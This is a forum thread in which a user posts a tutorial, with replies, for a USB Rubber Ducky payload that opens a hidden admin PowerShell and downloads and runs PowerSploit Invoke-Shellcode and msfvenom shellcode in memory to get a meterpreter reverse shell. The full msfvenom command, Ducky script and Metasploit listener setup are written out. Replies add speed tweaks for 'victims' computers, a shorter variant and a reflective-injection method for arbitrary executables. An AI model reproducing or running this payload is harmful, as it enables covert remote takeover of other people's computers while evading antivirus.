Jump to content

Recommended Posts

Posted (edited)

Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we?

Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt

The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. 

STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer).

Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that!

STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines.

 

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden 
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
ENTER 
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
ENTER
DELAY 1000
STRING Invoke-Shellcode -Shellcode ($buf) -Force
ENTER 

 

 

What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code.

 

To set up the listener, open up a terminal in Kali.

>msfconsole

>use exploit/multi/handler

>set payload windows/x64/meterpreter/reverse_https

>set LHOST XXX (whatever IP you used, which would be your kali machine IP)

>set LPORT XXX (whatever port you used)

>exploit

 

And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.

 

Edited by GunZofPeace
Posted

Very good. I think the pastebin is better in this case because you can post anonymalsly, but its just my opinion...

Do you think this will work with the meterpreter/reverse_tcp ? 

Posted

Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice.

Posted
5 hours ago, henna3 said:

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

I'm not sure. I don't see why you would do that though if the shellcode already gives you a meterpreter shell. I think the .exe has to be able to be converted into a powershell format, but google it! Sorry I can't help you with this

Posted
5 hours ago, kbeflo said:

Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice.

So for this script I have the DELAY numbers quite high. it all depends on the computer specs, like how fast it is able to start up powershell, enter the commands, etc. Try lowering the DELAY numbers by half. It improves the speed greatly! Just test the script with different DELAYs and see how fast you can get your computer (or victims) computer to run the commands. Try putting 250 for the first four DELAYs. That should run it a lot quicker!

  • 1 month later...
Posted
Quote
On 7.2.2017 at 7:39 AM, GunZofPeace said:

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden 
ENTER
DELAY 1000

 

I think its posible to replace this code with:

 

DELAY 500

GUI R

STRING powershell -WindowSytle hidden

ENTER

DELAY 1000

 

 

It`s a little bit shorter and saves Time :)

  • 1 month later...
Posted
On 2/8/2017 at 8:17 AM, henna3 said:

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

If it is unmanaged code, you can do it with Powersploit's Invoke-ReflectivePEInjection.ps1.  The exe will need to be read in as a byte array to be used.  You can load the Powersploit module into memory and then load your own script that will handle pulling down the exe that you already converted to byte array and then to base64 encoding to transfer.  Decode back to byte array and then inject into your current process or select one with the arguments of the exe if any.

If it is managed.  You might can do it with reflections assembly but I only done this with .NET DLLs, do not know if it works with .NET exes.

If you really want the shellcode, it has to be unmanaged code (C, C++, no .NET).  You can use a disassember to get the op codes or use a c compiler to dump the object which will have the op codes.  There are tutorials online on how this is done in more detail both ways.  Anyway it goes, you may have to mess with it to get rid of nulls for it to be workable shellcode.  The first 2 options involve no shellcoding and no disk touching.  It looks like the primary use of this topic is to use meterpreter shellcode which msf can create for you easily.  If you want to easily create shellcode to execute something, take a look at msf's payload windows/exec which can compile an unmanaged exe or even shellcode I believe.

  • 1 month later...
Posted

Hi! Thank you for your post.

I am very new to all this and I could really use some help. I followed your instructions, so I got metasploit to start handler but it does not create a session. I did not get any errors but it seems that scripts, which supposed to be running on Windows, are not communicating back to the handler (that's at least what I think is happening). The problem might be because I saved the cmd code as .bat and .cmd. I run them both but did not notice in task manager that any of them started shell. Not sure what I am doing wrong but if anybody has any idea it would be much appreciated. Thank you.

  • 4 years later...
  • 1 month later...
Posted
On 2/7/2017 at 7:39 AM, GunZofPeace said:

GUI x

I'm trying to test this script on my WIndows 11 for testing - but when using GUI x - it'll start setting - and goes to renome the PC ( and then execute the commands as the new PCname)
Should it be something else that GUI x in Windows 11 - for getting the access to the Powershell

 

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...